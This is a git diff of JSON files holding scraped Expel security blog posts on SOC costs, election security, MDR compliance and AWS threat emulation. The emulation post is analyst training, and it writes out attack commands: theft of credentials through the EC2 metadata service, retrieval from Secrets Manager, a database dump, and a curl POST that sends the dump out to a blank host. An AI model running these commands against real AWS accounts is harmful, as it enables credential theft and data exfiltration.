fashion (see what we did there?). Heading into February, we thought about the many things that bring the Black community together and showcase its beauty, which helped us identify the perfect vessel for education: music. From there, we determined our Black History Month 2023 theme would be An Introduction to Black Art through Music. Throughout February, our BOLD community shared weekly Slack posts that educated our people on the impact of Black music throughout the world. These posts explored genres such as ragtime, blues, gospel, jazz, R&B, hip-hop, and reggaeton. These posts also painted a timeline that acknowledged music as one of the few possessions slaves brought with them to the Americas. But the celebration didn\u2019t stop there. To further connect to our theme, we brought the education to life by hosting a live performance at Expel\u2019s interdimensional HQ by genre-bending Washington, D.C.-based duo April + VISTA . The performance was filled with lush, multidimensional sounds as the duo guided us through ancestral reflections through song. The performance was accompanied with a lunch from Maker\u2019s Union Pub for the People and sound equipment was provided by Zoney Sound \u2014both Black-owned businesses\u2014enabling us to lean into an all-around celebration of Blackness. Still stunned by April + VISTA\u2019s performance, our journey then took us to the heart of Miami for our first-ever company kickoff (CKO), which brought together more than 400 Expletives to meet, learn, and plan for the year ahead. Miami is known for its warm weather, great food, beautiful beaches, and most importantly its rich and vibrant culture. We knew Miami would provide a great backdrop to further explore Black impact and influence. To emphasize this, we brought in Miami-based, Ghana-born artist Nii Tei to DJ our welcome reception. Nii\u2019s set seamlessly blended house-, electronic, and disco-inspired sounds with African influences, creating a soundscape that reflected Black creativity and expression. Having most Expletives in one place for CKO also presented an ideal opportunity for additional education about Black history in Miami, so our BOLD community collaborated to create an exhibit that highlighted the Black historical context of the city. The exhibit acknowledged the Black impact on places like Overtown (formerly known as Colored Town), as well as Little Havana\u2014a place many Cuban Americans call home and has now expanded to include a large population of people from other parts of the Caribbean and Central America. We recognized iconic places like Little Haiti that boast rich French\u2013Creole culture and also highlighted how important the Jewish community\u2019s alliance with Black racial equality activists in the late 1950s supported desegregation efforts. Wow\u2026what a month! And to add on to our celebration of Black impact, our Women of Expel (WE) and Treehouse ERGs shared their support by highlighting the intersectionality among our communities recognizing Black women and LGBTQ+ trail blazers such as Bell Hooks, Alice Ball, Marsha P. Johnson, and Gladys Bentley. As we carry the celebratory spirit into Women\u2019s History Month, we\u2019re excited for continued programming and educational opportunities. We encourage you to check out our equity, inclusion, and diversity (EID) page to learn more about our ERGs and our approach to EID." +} \ No newline at end of file diff --git a/how-much-does-it-cost-to-build-a-24x7-soc.json b/how-much-does-it-cost-to-build-a-24x7-soc.json new file mode 100644 index 0000000000000000000000000000000000000000..2d8df17016df71a741c3bb0a886e34cdfec85590 --- /dev/null +++ b/how-much-does-it-cost-to-build-a-24x7-soc.json @@ -0,0 +1,6 @@ +{ + "title": "How much does it cost to build a 24x7 SOC?", + "url": "https://expel.com/blog/how-much-does-it-cost-to-build-a-24x7-soc/", + "date": "Feb 28, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG How much does it cost to build a 24\u00d77 SOC? Security operations \u00b7 8 MIN READ \u00b7 YANEK KORFF \u00b7 FEB 28, 2018 \u00b7 TAGS: How to / Planning / SOC The phone rings. It\u2019s your boss. \u201cHow much is it going to cost us to take our SOC to 24\u00d77?!\u201d It sounds urgent. It turns out he\u2019s calling because he just saw someone tweet about a data breach at one of your competitors. You\u2019re tempted to throw out \u201ca million dollars\u201d as an estimate. It seems as good a place to start as anywhere. But is it? After all, the costs of building and operating a 24\u00d77 security operations function can vary greatly. One of the biggest factors impacting cost is how \u201cgood\u201d you want to be. Do you need an excellent security operations center (SOC)? Or just one that\u2019s good enough? Or maybe something in-between? Turns out there\u2019s a \u201cfloor\u201d cost that you\u2019re unlikely to go under if you\u2019re shooting for \u201ccompetent.\u201d Beyond that, the sky\u2019s the limit. Let\u2019s take a look at how we get to a right-sized answer that fits your particular situation. Night of the roundtable: adjectives matter when you build a SOC It\u2019s tempting to whip out the calculator and start adding up the dollars, but not all SOCs are built alike. Are you building something basic? Advanced? What do these adjectives even mean? A few years ago, our CEO was hosting a roundtable dinner with a room full of fellow CEOs. The topic was cybersecurity operations and the CEOs felt strongly that they needed to up their game. What they were doing just wasn\u2019t good enough. It was time to push the pendulum to \u201cstate of the art.\u201d What exactly does that look like, and what\u2019s the price tag? Let\u2019s look at the spectrum of what a SOC might do. Security Operations Center (SOC) Capabilities Whew. That\u2019s quite a lot of capability and it begins to represent what a state-of-the-art SOC entails. Add all of that up and depending on how big your organization is, a SOC could cost anywhere from a few million dollars to half a billion 1 (or heck, even unlimited 2 ). Now, back to that CEO roundtable. After the whole state-of-the-art discussion, one of the CEOs in the back of the room raised her hand, \u201cConsidering we\u2019re not a big bank, what\u2019s good enough and how much does that cost?\u201d The SOC cost breakdown consists of several elements. Frankly, the foundational investments for \u201cgood enough\u201d aren\u2019t any different than \u201cstate-of-the-art.\u201d You\u2019ll need people. While there are seemingly endless shift schedules to choose from, our experience in building 24\u00d77 security teams tells us that the minimum number of people you\u2019ll want operating in a SOC is 12. You could probably get by with eight, but vacations and illness will result in individuals being stranded alone on shift. Considering even entry-level security analysts command $75,000/year in salary alone, your cost to operate a SOC starts at roughly a million dollars. Beyond people, the next largest impact on your SOC\u2019s efficacy will be your technology and how easy you can make it for your people to use. Any SOC that doesn\u2019t have the right technology to provide visibility, detection, and investigative capabilities will end up being pretty useless, regardless of how many people you throw at it. While the technology bill at smaller organizations will only be a fraction of the staffing costs, as an organization grows, those tech costs can really skyrocket. Now that we have a sense of our base costs, let\u2019s imagine four possible security operations centers. These examples map relatively well to examples we\u2019ve seen in the field\u2013both at customers and at service providers. 1. The basic SOC This SOC focuses primarily on detection (but not so much on investigation). They\u2019ve invested sparingly in technology and have an odd assortment of visibility, partially due to investments the last CISO made and partially due to the current limited budget. Analysts work primarily in a SIEM that was deployed several years ago and it just hasn\u2019t been kept up to date. Overall, these technologies offer decent detection capability but there\u2019s not much flexibility to tune how they work with additional intelligence or use them for more advanced investigative use cases. Spending time doing investigations or engaging in \u201chunting\u201d isn\u2019t really in the cards at all. There hasn\u2019t been a major incident, but the current CISO worries: if there were, would his SOC find it? 2. The intermediate SOC At this level, the SOC has mastered detection and the technology investments provide reasonably good visibility into the organization\u2019s nooks and crannies. Beyond the basic detection capability of a SIEM fed by event logs, the SOC has deployed a combination of EDR and network forensics technologies that provide advanced threat detection. Security analysts operate at multiple tiers; some of the more senior practitioners frequently leave the SIEM to take advantage of unique capabilities their advanced tech offers. The team really wants to spend more time being proactive, but \u201coperational reality\u201d makes that difficult. SOC management oscillates on a day-by-day basis: some days they\u2019re confident about the capabilities of their SOC, and other days they feel blind and they worry there\u2019s stuff on the network they don\u2019t know about. 3. The advanced SOC SOCs that get to this level have made a tremendous investment in tooling to free up their analysts\u2019 time. Tier one and two analysts are working primarily in a SIEM. But that\u2019s only because they\u2019ve taken the time (along with a good dose of help from outsiders) to tune their correlation rules and plug some of their more specialized products into the SIEM. They can even pull data from their network and endpoint security products without leaving the SIEM. This improves the quality (and speed) of their investigations. When they escalate incidents, tier three analysts pick them up and pivot directly to more sophisticated analysis tools and consoles. While good things come in threes, advanced SOCs often add a fourth cadre of analysts called the \u201chunt\u201d team. They\u2019re not part of the 24\u00d77 rotation. They focus exclusively on finding things their tech missed. While they do a little work in the SIEM, they spend most of their time building and running custom scripts to find threats their security products aren\u2019t alerting on. Lastly, there are a couple of groups helping to make all of the underlying tech runs. Intelligence analysts make sure that the intel feeding the technology is up to date, ensure it\u2019s not burying shift analysts in useless alerts, and\u2013when serious threats arise\u2013add color and context so that management understands the risks they\u2019re facing. Finally, you\u2019ll see engineers whose job is to build software that makes their security products talk to each other. This helps streamline their processes and automate data gathering as best as they can. For lack of a better term at this organization, they call themselves SOC plumbers. The CISO in the advanced SOC is comfortable with her security operation and periodically brings in third parties to run red team exercises to ensure the SOC is performing as she\u2019d expect. 4. The learning SOC Like the advanced SOC, this organization has invested an enormous amount of time and money in automation and analytics. They\u2019re focused on ensuring that humans are doing the security work that only humans can do. Everything else is handled by software. To that end, they\u2019ve tied their security technologies together with an orchestration framework and pulled in resources from IT to help automate investigation and remediation. As a metrics-driven organization, they watch closely what the ratios are between false positives and true positives, how long it takes to triage and investigate, and how much value they\u2019re getting out of their security investments based on usage. These metrics drive a constant stream of change back into the infrastructure because the tuning is never done. A note of caution here: just because you have metrics doesn\u2019t mean you\u2019re operating at this level. They\u2019re a necessary but not sufficient condition. Every time the CISO brings in a red team (he rotates between three vendors) he reviews the metrics to ensure time-to-detect, time-to-respond and the overall accuracy that\u2019s coming out of his SOC is improving. There\u2019s still no guarantee his organization\u2019s \u201csecure,\u201d but he feels prepared to respond should anyone get in. Picking the SOC that\u2019s right for you What SOC is right for you? Perhaps it\u2019s one of the examples above. Or, maybe it\u2019s something in between. Only you can determine what\u2019s right for your organization, but Expel might be able to assist you in choosing what\u2019s right for your organization. We\u2019ve found that the best way to figure out how much \u201csecurity\u201d you need to put in place is by looking at things through the lens of risk, specifically through a framework. It probably doesn\u2019t matter which one, but starting with the end in mind is better than going YOLO . I know. It sounds kinda boring. It would be a lot more fun to go buy and implement a bunch of whizz-bang security tech. We see this a lot. But we also see these organizations paying a price in the end. A few years down the road their whizz-bang security tools are gathering dust and their people are overwhelmed with useless alerts. If you\u2019re willing to take this more step-by-step approach, we recommend NIST\u2019s Cybersecurity Framework . It\u2019s not the only one you can use, but it breaks down security practices into five simple functions: identify, protect, detect, respond, and recover. It also encompasses a whole lot more than what goes into a SOC, which makes it even more useful. That said, if you\u2019re focused on SOC operations, you\u2019ll find your best guidance within detect and respond with a few relevant nuggets in identify . We\u2019ll be providing a lot more guidance about this framework on the EXE blog soon, but for now, the important thing to know is that your level of \u201crigor and sophistication\u201d doesn\u2019t need to be at level 4 across the board. It\u2019s more like building out your D&D character. You\u2019re essentially allocating a limited set of points across charisma, agility, and strength. Adding it all up After you\u2019ve determined the kind of risks you want to manage and mitigate, you\u2019ll have a better notion of the kind of SOC you need to build. Below, we\u2019ve outlined a rough estimate for purchasing SOC technology and staffing the team. Because technology 3 costs can vary significantly based on the size of the organization, we\u2019re imagining an organization with about 5,000 employees. Bear in mind that at larger organizations, the costs of technology can increase dramatically. Sample costs for SOC-related tools, staffing, and implementation Based on an organization of 5,000 employees That\u2019s a wrap Understanding the true costs of building and operating a SOC has more to do with the capability you\u2019d like to field than the people you need to hire to run 24\u00d77. Hopefully, this post has helped you estimate a little better what kind of SOC you\u2019d like to build and how much that might cost. And look, if you\u2019re sitting here thinking \u201coh man, this isn\u2019t the kind of money I want to be spending. Security\u2019s not a core part of my business, and there\u2019s no way we\u2019re going to become experts at it,\u201d well, a great many people end up at that same conclusion. In that case, it might be worth considering outsourcing your security operations center and going with SOC as-a-service model . I\u2019ll leave you with a parting thought. If you do decide that building your own SOC capability is a bridge too far, consider when you\u2019re outsourcing what exactly your SOC provider is bringing to the table. Is it basic or advanced? Just the hunting use case? There are infinite ways in which these capabilities can be carved up, and the better you understand what capabilities you need, the better equipped you\u2019ll be to build them or buy them. 1: Forbes \u201cWhy J.P. Morgan Chase & Co. Is Spending A Half Billion Dollars On Cybersecurity,\u201d 30 Jan 2016 https://www.forbes.com/sites/stevemorgan/2016/01/30/why-j-p-morgan-chase-co-is-spending-a-half-billion-dollars-on-cybersecurity/?sh=3c58f0f02599 2: Forbes \u201cBank of America\u2019s Unlimited Cybersecurity Budget Sums Up Spending Plans In A War Against Hackers,\u201d 27 Jan 2016 https://www.forbes.com/sites/stevemorgan/2016/01/27/bank-of-americas-unlimited-cybersecurity-budget-sums-up-spending-plans-in-a-war-against-hackers/?sh=6ab120a264cd 3: We\u2019re focusing on SOC-specific tools, not the bread-and-butter security investments organizations make for things like basic firewalls, identity and access management, patch management, vulnerability management, and the like." +} \ No newline at end of file diff --git a/how-public-private-partnerships-can-support-election-security.json b/how-public-private-partnerships-can-support-election-security.json new file mode 100644 index 0000000000000000000000000000000000000000..fbd672f9b737072a79021b894e64416191acbc57 --- /dev/null +++ b/how-public-private-partnerships-can-support-election-security.json @@ -0,0 +1,6 @@ +{ + "title": "How public-private partnerships can support election security", + "url": "https://expel.com/blog/how-public-private-partnerships-can-support-election-security/", + "date": "Mar 14, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG How public-private partnerships can support election security Tips \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 MAR 14, 2019 \u00b7 TAGS: Cloud security / Managed security / Planning / Vulnerability Bruce Potter is our CISO here at Expel. In his past life, he served as the senior technical advisor to the members of President Obama\u2019s Commission on Enhancing National Cyber Security. It\u2019s only March but it feels like November 2020 is right around the corner. In case you\u2019ve been living under a rock, election security is a hot topic leading up to the next national election \u2014 every day there\u2019s a new headline about how to improve election technology or get rid of it altogether or how to stop threat actors from meddling in U.S. elections . Between security at the ballot box, concerns around central voting databases, issues with third-party data aggregators and information operations on social media, there\u2019s a lot to keep tabs on. Many of the potential answers to the \u201cWhat should we do about it?\u201d question falls into the public policy realm. Various national, state and local agencies are responsible for addressing some of these issues. The integrity of voter registration databases is largely a state and local government concern. As much as private industry may have opinions on how to properly secure these systems, it is ultimately the job of dedicated civil servants to decide what to protect and how to do it. That begs the question \u2026 What can and should the private sector do? And specifically, how and why should private sector security organizations be involved? Cybersecurity companies have an incredible capability to know the nitty gritty details of malware and malicious activities that are happening inside our customers\u2019 networks and systems every single day. These companies are the ones that are on the front lines when it comes to defending businesses against attacks ranging from commodity malware to highly targeted state actors. While the U.S. government does its part when it comes to protecting our democracy and could do even more, the reality is that many citizens look to the government for help in times of crisis but want the government to be involved in as little as possible on a regular basis. I\u2019ve done a fair bit of contract work with the government that had the potential to positively impact the private sector, but there were often hurdles outside each respective agency\u2019s control that stalled or complicated each project. First \u2014 which is sometimes the case for cybersecurity in general \u2014 there are various spheres of authority that get in the way of productive outreach. National Security Agency (NSA) has lots of great ideas but is in general only responsible for the protection of classified systems. Defense Advanced Research Projects Agency (DARPA) and Department of Defense (DoD) have \u201cdefense\u201d in their names, so you know what their focus is. And Department of Homeland Security (DHS) often is focused on critical infrastructure but not on the protecting citizens at large. With no single agency leading the charge on all things cybersecurity, it\u2019s difficult to find a point person to conduct public outreach. Second, and more the purview of the private sector, is the concern that when the government shows up and says, \u201cWe\u2019re from the government, we\u2019re here to help,\u201d our natural inclination is to be incredibly skeptical. It can be difficult to accept assistance and outreach from a government agency when there\u2019s no overt problem to contend with. However, without ongoing involvement that starts long before there\u2019s ever a problem, it\u2019s difficult if not impossible for the government and private sector to collectively be effective when there\u2019s an issue. Private industry is an essential part of our national defense when it comes to cybersecurity. The stronger the security of private industry organizations and their service providers is, the better the security of our nation. We\u2019ve recognized that in formal policy already through the Clinton-era Critical Infrastructure definitions . It\u2019s time we think about how private industry can participate in protecting our democracy through future election cycles. Imagine a public-private partnership \u2014 yes, this is an overused phrase and even a \u201cdirty word\u201d in some circles \u2014 between U.S. government entities \u201cin the know\u201d and cybersecurity companies that have visibility into global networks with the specific purpose of sharing information around election integrity. While there are pockets of sharing outside of critical infrastructure verticals (sometimes through MOUs, other times through a simple handshake), there is no comprehensive program in place to share information about election security with a broad set of private sector partners. What advantage would this type of program have? First off, managed security service providers (MSSPs) and endpoint detection and response (EDR) companies have an incredible view into the global operations of businesses across many industries, and a deep understanding of the security concerns and threats they face each day. If the U.S. government would share the tactics, techniques and procedures of know election threat actors, private sector cybersecurity firms could develop custom detection rules to find these actors within the global networks we have visibility into already. Then, working with our customers, we could quickly share information with the government to inform their operations and help stop attacks against our election systems. Further, this sort of partnership will shed light into the darkness. The more that private sector entities become engaged in this problem, the fewer places the adversaries have to hide. While we know some of what has transpired in social media, little of that has been shared with the public and the data has largely been confined to a few large tech companies. Involving a broad group of cybersecurity organizations in these activities will help demystify malicious activities that target not just U.S. elections but those around the globe. Of course, this type of partnership doesn\u2019t come without risk. Cybersecurity companies are often third parties to the data they oversee \u2014 the data is actually owned by their customers and can\u2019t be shared without explicit permission. In order to be successful, this type of program would have to be well socialized in advance in order to get buy in not just from the cybersecurity companies but from the organizations they support. Which means that if a program like this were to exist, the gears need to be turning now in order to have an impact on 2020 elections. Private sector cybersecurity companies can do far more than just writing blog posts about election security or shaking their collective fists at the cloud. By pulling more private sector partners into the fight against election meddling, the U.S. government can multiply the impact of the knowledge it already has about election threat actors. And by including a broad set of companies \u2014 not just a few large companies \u2014 we can collectively see into more dark corners and find more malicious activity than would otherwise be possible. We\u2019d also be spreading knowledge of our actions farther and wider, giving a sense of real progress and security to the public at large. At the end of the day, that\u2019s exactly what our citizens and our national election systems deserve." +} \ No newline at end of file diff --git a/how-should-my-mdr-provider-support-my-compliance-goals.json b/how-should-my-mdr-provider-support-my-compliance-goals.json new file mode 100644 index 0000000000000000000000000000000000000000..763fb5bdccf08c2ccf3584aa94a2b4a064228b76 --- /dev/null +++ b/how-should-my-mdr-provider-support-my-compliance-goals.json @@ -0,0 +1,6 @@ +{ + "title": "How should my MDR provider support my compliance goals?", + "url": "https://expel.com/blog/how-should-mdr-provider-support-compliance-goals/", + "date": "Jul 20, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG How should my MDR provider support my compliance goals? Security operations \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 JUL 20, 2021 \u00b7 TAGS: MDR So someone told you that you need to make sure your tech, privacy and security policies are \u201ccompliant.\u201d And that you need your managed detection and response (MDR) provider to support your compliance program. But what does that mean in practice? There are things you need to do to make sure your tech and data are secure and following security best practices. You\u2019ve done those things, and you\u2019ve checked your work so that if anyone wants to verify you\u2019re doing the right things, you can confidently say you\u2019ve done your due diligence. That\u2019s really what\u2019s at the core of any compliance initiative, regardless if it\u2019s regulatory compliance, industry compliance or just adhering to internal policies. Any good MDR provider should support you in those efforts (we\u2019ll get into how they should specifically do that in a moment). You don\u2019t need your security provider to be a compliance liability. What types of compliance impact a security program? Compliance comes in all shapes and sizes. For example, your boss or your board of directors might ask you to make sure your security program is compliant with: Internal company policies Industry regulations Standards frameworks Government regulations Laws and treaties Customer audits For some compliance checks, you may go through an audit. Audits are for compliance frameworks where: Some policy/regulation oversight group has blessed specific audit companies to analyze how well you are complying with the framework; The compliance framework is standardized, so one auditor would likely find the same results as any other auditor; and The audit often results in some sort of certification saying you\u2019re compliant (wo0t!) \u2013 PCI DSS , ISO 27001 / 27701 and SOC 2 certifications are all pretty common. For other policies and regulations, you may go through a compliance assessment rather than an audit. For these regulations, there\u2019s no oversight group that sets out a strict framework to follow, so companies have to take their best guess as to whether or not they\u2019re compliant based on what they know about the policy or regulation requirements. One common example is GDPR \u2013 there\u2019s no official audit available, so your company may hire a third-party assessor to determine if your tech and policies are in line with the requirements to keep personal data secure. Compliance = things you need to do to keep your data and tech secure + someone verifying you\u2019ve done those things How Expel supports your compliance goals Lots of our customers here at Expel have various compliance standards they need to follow. Here\u2019s a peek at how we support some of the most common compliance frameworks, and how we think any MDR you choose to work with should support you in meeting your compliance goals. SOC2 : Expel is SOC2 Type 2 certified, meaning we\u2019ve demonstrated that we safely hold and process our customers\u2019 data. This is a good initial security certification to look for when you\u2019re evaluating MDRs. ISO 27001 / 27701 : Expel is also certified for these international cybersecurity and privacy standards, which are even more detailed and process-oriented than SOC2 (read: we care a lot about security!) If you have a complex security situation or strict industry security requirements, these certifications can help indicate that your MDR takes their security equally seriously. GDPR : There\u2019s no official GDPR audit available (yet), but we encourage our customers to work with a third party to perform their own independent GDPR assessment. We did the same here at Expel (feel free to ask us about it). If you\u2019re looking to comply with GDPR, your MDR should also meet GDPR-like requirements for handling your data. NIST 800-171 : Like GDPR, there\u2019s no official audit available right now for this standard to protect government unclassified information. At Expel, we did an internal self-assessment and are working with a third party for an independent assessment \u2013 we\u2019d encourage you to do the same. Working with Expel or other MDR can also help you fulfill a number of the standard\u2019s requirements regarding monitoring, alerting, reporting and responding to incidents. CMMC (Cybersecurity Maturity Model Certification) : This is an upcoming standard that\u2019s being included in a number of Department of Defense contracts for detailed, risk-based security. Since CMMC isn\u2019t fully rolled out, there aren\u2019t any auditors (yet) \u2013 but you can do what we did and have a third party perform an independent assessment to prepare for the rollout (Questions? Ask us !) PCI DSS : A designated PCI DSS auditor can analyze your compliance with this payment card data security standard. Expel can (and your MDR should) support your compliance by providing real time analysis and response to security alerts. HIPAA : Like for PCI DSS, Expel can support your HIPAA compliance by analyzing and responding to your security alerts in real time. To sum it up, your MDR should be able to support your compliance goals in three ways: They should help you meet the requirements for your desired compliance frameworks so you can get those certifications and meet your security goals (#winning). For example \u2013 going after PCI and need to ensure security alerts are being investigated? Have a security operations-related audit finding that you need to fix? Your MDR should be able to help. Your MDR should be able to demonstrate their compliance with various security/privacy standards to keep your data safe as their customer. Your MDR should help you maintain your existing compliance achievements. You\u2019re GDPR compliant? Great! Your MDR should make sure their work won\u2019t change that. Compliance may feel overwhelming, but think of your MDR as your compliance partner \u2013 holding hands to dive into the pool of NIST frameworks and ISO certifications together. Your MDR can help you make sure you\u2019ve got the right things in place to keep your tech and data secure, helping you breathe a little easier when it\u2019s time for your next audit or assessment." +} \ No newline at end of file diff --git a/how-to-build-a-useful-and-entertaining-threat-emulation.json b/how-to-build-a-useful-and-entertaining-threat-emulation.json new file mode 100644 index 0000000000000000000000000000000000000000..b376952877ca8bd4ac1618adb8791dd08b24080b --- /dev/null +++ b/how-to-build-a-useful-and-entertaining-threat-emulation.json @@ -0,0 +1,6 @@ +{ + "title": "How to build a useful (and entertaining) threat emulation ...", + "url": "https://expel.com/blog/how-to-build-useful-threat-emulation-exercise-aws/", + "date": "Apr 4, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG How to build a useful (and entertaining) threat emulation exercise for AWS Security operations \u00b7 7 MIN READ \u00b7 DAN WHALEN \u00b7 APR 4, 2019 \u00b7 TAGS: Cloud security / Get technical / How to / Managed security / SOC If you ask the average security analyst how they detect threats in Amazon Web Services (AWS), you\u2019ll probably get some blank stares, shrugs or a few mumblings about exposed S3 buckets and bitcoin mining. The problem is that many orgs aren\u2019t fully aware of the risks that exist in their AWS environment, and they\u2019re still learning what they\u2019re responsible for securing versus what AWS monitors. That\u2019s exactly why we love threat emulation exercises and practice them regularly. Simulating realistic attacks in cloud environments help our analysts build muscle memory and prepare them to act quickly and correctly when something bad happens. Getting started Lots of our customers run at least part of their infrastructure in AWS, so we\u2019ve built quite a few threat emulation exercises that are specific to the AWS environment. They help our analysts sharpen their intuition around AWS services, better understand cloud-based evidence sources and dig into the investigative workflow. Want to create an AWS-focused threat emulation exercise? Here are our tips and tricks for building your own. Step 1: Define the goals and scope Sure, crafting the story for your exercise is the fun part but before putting pen to paper, think about what you (and your team, if you\u2019re lucky enough to have one) want to get out of the exercise. What are your goals? Here are the two priorities we had when we ran our first AWS threat emulation exercise: Learn about different kinds of AWS attacks, especially the ones that aren\u2019t intuitive AWS is a new challenge for security analysts who cut their teeth in traditional enterprise response, so there aren\u2019t many parallels between AWS attacks and the on-prem ones most security analysts are used to investigating. That\u2019s because there are tons of AWS services \u2014 over 100 to be exact \u2014 each with their own nuances and security implications. As an industry, we\u2019re still learning about areas of risk with each AWS service \u2014 think misconfiguration of Amazon S3 bucket access policies and credential theft via Amazon EC2 . By building some of these new attack vectors into our threat emulation exercises, we improved our SOC\u2019s ability to investigate and respond to these kinds of attacks when they happen in the real world. Get hands-on experience with common AWS services Even if you dedicate time to read through (the admittedly very comprehensive) AWS documentation , it\u2019s inevitably tough to remember it all (and know how to act on it) in a real-world, high-pressure situation. Getting hands-on experience with AWS services like Amazon EC2, Amazon S3 and Amazon RDS helps you commit this information to memory so you\u2019ll be more prepared to act quickly when an attack happens. For example, during threat emulation exercises Expel analysts log into \u201ccompromised\u201d EC2 instances and collect forensic information for analysis. Through this process, they get familiar with other sources of evidence from AWS services like Amazon CloudTrail and Amazon GuardDuty. Step 2: Build the thing Building a threat emulation requires more than just standing up infrastructure. Here are the building blocks you can use to create your own exercise: Craft an engaging story During threat emulations, you want your analysts to learn new things, work toward a common goal and have fun while doing all of it. Create a realistic story but add a dash of humor here and there. We created a fictional organization dubbed Widget-Corp, complete with pretend employees, a website and a business model. To make our scenario even more believable, we developed personas for Widget-Corp employees including descriptions of what \u201cnormal\u201d activities for these employees looked like. This gave our analysts the challenge of figuring out what behavior was legitimate and what was suspect during the simulation.Take a look at our Widget-Corp \u201cemployee\u201d profiles and the story we crafted: Employee Profile Mr. Widget He\u2019s the CEO of Widget-Corp. Mr. Widget can be a bit intense at times, but all in all he\u2019s a good boss that just wants to lead the booming widget market. His primary concern of late is the activities of Widget-Corp\u2019s biggest competitor \u2013 Best-Widgetz. Donna Reynolds Donna is a back-end engineer responsible for managing compute instances and the master Widget database containing sensitive customer information. Gerald Watson Gerald is a front-end web developer responsible for Widget-Corp\u2019s website. James Smith James is a Widget developer who builds and commits Widget source code. Norma Cooper Norma is a Sr. Widget developer and is responsible for final Widget code review. Background Widget-Corp has moved to the cloud! After one of the servers in the back office closet caught fire and nearly destroyed a fair amount of Widget source code, the executives finally decided that managing hardware in house didn\u2019t make sense. Widget-Corp now runs entirely out of AWS! In fact, their engineers were quite satisfied to discover that there are all kinds of AWS services that make shipping widgets and managing customer data much easier. They were even able to migrate their website https://widget-corp.com to AWS in a matter of hours! Hooray! Widget-Corp CEO, Mr. Widget, has noticed lately that a competitor (Best-Widgetz, Inc) has been releasing widgets to the market right before big Widget-Corp releases. To make matters worse, they seem to be ahead of the curve and are targeting functionality and customers of Widget-Corp! They\u2019ve already lost a few customers \u2026 this is not good. Additionally, their front end web developer, Gerald, recently noticed some weird updates to the about section on the website \u2026 Mr. Widget is a bit paranoid that something nefarious is going on and has hired Expel to run a surge engagement and identify if there are any signs of compromise in their AWS environment. If Best-Widgetz has managed to get customer data or source code somehow, that would put Widget-Corp at a serious disadvantage! Build believable infrastructure Build your environment based on the goals you set for the exercise. We created a new AWS account that included all the infrastructure we wanted to be part of the simulation. Pro tip: Create an architecture diagram to keep track of all the (literally) moving parts. Here\u2019s an example: Generate benign activity Remember those personas we created? Once our infrastructure was up and running, we generated \u201cnormal\u201d activity for each Widget-corp employee. This makes the exercise more realistic because you\u2019ll have to figure out what\u2019s routine (like Donna accessing a secret or James committing source code to an Amazon S3 bucket) versus a red flag. Generating this activity is easy. Just log in and perform the actions you\u2019d expect that persona to do in AWS on a regular basis. Choose a plausible attack scenario Think about the risks that exist in your own environment and use them as inspiration for your attack scenario. In our case, we simulated an end-to-end AWS attack starting with compromised credentials for a low-privilege user and ending in complete access to the environment. It may sound kind of extreme but this kind of attack happens more often than you\u2019d think \u2014 attackers often gain access to something small like an API key committed to a public GitHub repository and end up with the keys to the kingdom. Step 3: Execute the simulated attack Once you\u2019ve built your AWS environment and your scenario, it\u2019s time for the real fun to begin. Here\u2019s what our simulated attack looked like: Attacker gains initial access via compromised credentials We kicked off our scenario by having our attacker compromise credentials from one of our faux employees, Mr. Smith. Let\u2019s pretend he downloaded a file and inadvertently installed malware on his laptop. Our crafty attacker then logged into the Widget-Corp EC2 server with his credentials: Attacker pokes around for interesting data Now that the attacker is on the development server, he\u2019s trying to get his hands on any juicy corporate data. Maybe he does some basic discovery like:\u2022 Seeing what commands poor Mr. Smith ran recently (cat ~/.bash_history) \u2022 Searching the file system for interesting files In this case, the attacker sees that Mr. Smith wrote some widget source code and uploaded it to S3. Attacker escalates privileges Now this clever attacker has access to everything James Smith does, but that\u2019s not going to be enough to accomplish his mission. One common way attackers escalate privileges in AWS is to dump credentials from the EC2 instance metadata service. Our attacker knows this and tries to get credentials with additional permissions: Nice! By using curl to access the metadata service at 169.254.169.254, the attacker discovered that the widget development instance is assigned an IAM role EC2DeveloperRole and the attacker can retrieve temporary credentials for this role. Using these credentials, he can search for more company data. Now he\u2019s looking for the Widget Database server and Widget Web server credentials. Attacker collects web server and database secrets Our attacker stole access keys from the Widget-Corp development server and he\u2019s moving on to retrieving secrets stored in the AWS Secret Manager. Listing the available secrets is as easy as: aws --profile widget-dev secretsmanager list-secrets Jackpot! The attacker finds credentials for the Widget Database server and Widget Web server. Here\u2019s how he retrieved them: aws --profile widget-dev secretsmanager get-secret-value --secret-id WidgetDatabaseCredentials Attacker performs additional post-compromise activities The attacker isn\u2019t done quite yet. Now that he has the keys to the kingdom, he can do all kinds of nefarious things. For the purposes of this exercise, we pretended that he dumped and exfiltrated the contents of the database server and defaced the web server: mysqldump -h widgetcorp-db.us-east-1.rds.amazonaws.com -u dbadmin -p customerdata > dump.sql curl -X POST -d @dump.sql http://:443 Mission complete! Now that your attack scenario is ready to go, it\u2019s time to unleash the analysts and see if the team can retrace these steps \u2014 highlighting detection gaps along the way. Step 4: Build the investigative steps and guidelines Building out the process that analysts will follow for the exercise is just as crucial as building the infrastructure. All of your hard work will be for nothing if the analysts get stuck and frustrated. We\u2019ve had luck with using Google Forms to guide our analysts through the threat emulation exercise and prompt them to ask questions along the way. Here\u2019s an example of a few of the initial questions we ask our analysts to answer during the exercise: Once you have a draft, have someone else on your team who\u2019s experienced give it a read. This will help you identify any ambiguous steps or process gaps \u2014 basically areas that need tweaking in your plan \u2014 that might trip up your analysts. Step 5: Run the exercise Once you\u2019ve got your infrastructure up and running and have your simulation ready, press \u201cgo\u201d and have your analysts get to work. Schedule dedicated time for your analysts to run through the scenario, answer questions and hopefully learn a thing or two. As your analysts get to work, don\u2019t miss the opportunity for them to practice their communication skills. We\u2019ve had success (and a lot of fun) using the personas we create to inject a bit of chaos. For example, we\u2019ve had Mr. Widget himself call the SOC and request an update on how the investigation is going. This is a great way to get the team used to communicating about investigations in AWS. What\u2019s next? After running a threat emulation, it\u2019s valuable to talk as a team about what worked well and what we can do better next time. Don\u2019t fret if the exercise exposes gaps \u2014 that\u2019s the point! Document these gaps and see if you can make changes to improve your next exercise." +} \ No newline at end of file diff --git a/how-to-choose-the-right-security-tech-for-threat-hunting.json b/how-to-choose-the-right-security-tech-for-threat-hunting.json new file mode 100644 index 